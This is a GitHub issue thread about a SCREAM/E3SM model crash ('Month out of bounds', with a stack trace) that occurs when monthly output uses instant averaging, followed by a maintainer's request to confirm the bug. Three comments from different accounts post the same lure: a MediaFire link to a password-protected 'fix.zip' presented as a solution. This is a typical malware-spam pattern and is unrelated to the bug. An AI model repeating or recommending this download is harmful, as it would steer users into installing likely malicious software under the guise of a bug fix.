### ISSUE TITLE
monthly instant output leads to failure.

### ISSUE THREAD

**Issue by whannah1** [E3SM-Project/scream#2968]
For some recent ne256 runs on Perlmutter I accidentally used `Averaging Type: Instant` for my monthly output stream and it led to this error message:
```
 800:
 800:  FAIL:
 800: mm>=1 && mm<=12
 800: /global/u1/w/whannah/SCREAM/SCREAM_SRC0/components/eamxx/src/share/util/scream_time_stamp.cpp:20
 800: Error! Month out of bounds. Did you call `days_in_month` with yy and mm swapped?
 800:
 800: terminate called after throwing an instance of 'std::logic_error'
 800:   what():
 800:  FAIL:
 800: mm>=1 && mm<=12
 800: /global/u1/w/whannah/SCREAM/SCREAM_SRC0/components/eamxx/src/share/util/scream_time_stamp.cpp:20
 800: Error! Month out of bounds. Did you call `days_in_month` with yy and mm swapped?
 800:
 800:
 800: Program received signal SIGABRT: Process abort signal.
 800:
 800: Backtrace for this error:
 800: #0  0x14ad68729dbf in ???
 800: #1  0x14ad68729d2b in ???
 800: #2  0x14ad6872b3e4 in ???
 800: #3  0x14ad68a98035 in _ZN9__gnu_cxx27__verbose_terminate_handlerEv
 800: 	at ../../../../libstdc++-v3/libsupc++/vterminate.cc:95
 800: #4  0x14ad68a96523 in _ZN10__cxxabiv111__terminateEPFvvE
 800: 	at ../../../../libstdc++-v3/libsupc++/eh_terminate.cc:48
 800: #5  0x14ad68a96575 in _ZSt9terminatev
 800: 	at ../../../../libstdc++-v3/libsupc++/eh_terminate.cc:58
 800: #6  0x14ad68a967b3 in __cxa_rethrow
 800: 	at ../../../../libstdc++-v3/libsupc++/eh_throw.cc:136
 800: #7  0x421ed6 in ???
 800: #8  0x604825 in ???
 800: #9  0x57bac4 in ???
 800: #10  0x56bc7c in ???
 800: #11  0x521ddc in ???
 800: #12  0x14ad6871424c in ???
 800: #13  0x55d689 in _start
 800: 	at ../sysdeps/x86_64/start.S:120
 800: #14  0xffffffffffffffff in ???
srun: error: nid002800: task 509: Aborted
srun: error: nid002800: tasks 508,510-511: Aborted
```

This is related to #2662 and PR #2664.  I can't imagine why anyone would want monthly instantaneous output - but it seems weird for the model to fail in this manner for these settings.

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AaronDonahue** [comment]
@whannah1 , can you confirm this is still an issue.  I tried to recreate w/ an ne4 test case and didn't encounter any issues writing monthly instant output
